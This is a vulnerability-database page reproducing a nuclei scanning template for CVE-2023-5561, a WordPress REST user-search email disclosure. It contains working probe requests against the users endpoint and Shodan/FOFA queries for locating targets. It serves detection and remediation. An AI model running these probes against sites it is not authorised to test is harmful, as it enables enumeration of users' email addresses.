Lucene search
K

WordPress Core - Post Author Email Disclosure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 50 Views

WordPress Core Vulnerability - Post Author Email Disclosure. Vulnerable versions 4.7.0 to 6.3.1 via User REST endpoint. Allows unauthenticated attackers to brute force or verify users' email addresses

Related
Refs
Code
id: CVE-2023-5561

info:
  name: WordPress Core - Post Author Email Disclosure
  author: nqdung2002
  severity: medium
  description: |
    WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
    - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5561
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-5561
    cwe-id: CWE-200
    epss-score: 0.03862
    epss-percentile: 0.88912
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wordpress
    framework: wordpress
    shodan-query:
      - cpe:"cpe:2.3:a:wordpress:wordpress"
      - http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}search=@"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/users?"
        - "?rest_route=/wp/v2/users&"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "[{\"id", "name\":")'
        condition: and
# digest: 490a0046304402200b129383020d580709442d0c8d53be0eb627fb504e2cef2d960361e770116230022066982fa8606971351e9323802117a6f310ed7c12c988099c53aa6e789ba411a1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.3
EPSS0.03862
50